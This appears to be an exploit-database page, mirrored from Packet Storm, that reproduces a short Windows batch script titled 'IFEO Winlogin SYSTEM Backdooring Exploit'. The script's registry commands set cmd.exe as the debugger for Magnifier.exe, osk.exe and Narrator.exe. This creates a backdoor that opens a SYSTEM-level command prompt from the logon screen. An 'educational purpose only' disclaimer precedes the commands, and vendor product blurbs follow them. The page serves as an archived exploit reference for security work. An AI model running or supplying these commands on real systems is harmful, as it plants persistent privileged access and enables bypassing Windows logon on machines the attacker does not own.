Lucene search
K

Microsoft Windows IFEO Winlogin SYSTEM Backdooring Exploit

🗓️ 20 Apr 2017 00:00:00Reported by Todor DonevType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Microsoft Windows IFEO Winlogin SYSTEM Backdooring Exploit by Todor Done

Code
`@ECHO OFF  
REM Microsoft Windows 'IFEO' Winlogin SYSTEM Backdooring Exploit  
REM   
REM Todor Donev <[email protected]>  
REM https://www.ethical-hacker.org/  
REM https://www.facebook.com/ethicalhackerorg  
REM  
REM https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/   
REM   
REM Disclaimer:  
REM This or previous programs is for Educational purpose ONLY. Do not use it without permission.  
REM The usual disclaimer applies, especially the fact that Todor Donev is not liable for any  
REM damages caused by direct or indirect use of the information or functionality provided by these  
REM programs. The author or any Internet provider bears NO responsibility for content or misuse  
REM of these programs or any derivatives thereof. By using these programs you accept the fact  
REM that any damage (dataloss, system crash, system compromise, etc.) caused by the use  
REM of these programs is not Todor Donev's responsibility.  
REM  
REM Use them at your own risk!  
  
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnifier.exe" /v Debugger /t REG_SZ /d "%COMSPEC%"  
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /t REG_SZ /d "%COMSPEC%"  
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v Debugger /t REG_SZ /d "%COMSPEC%"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation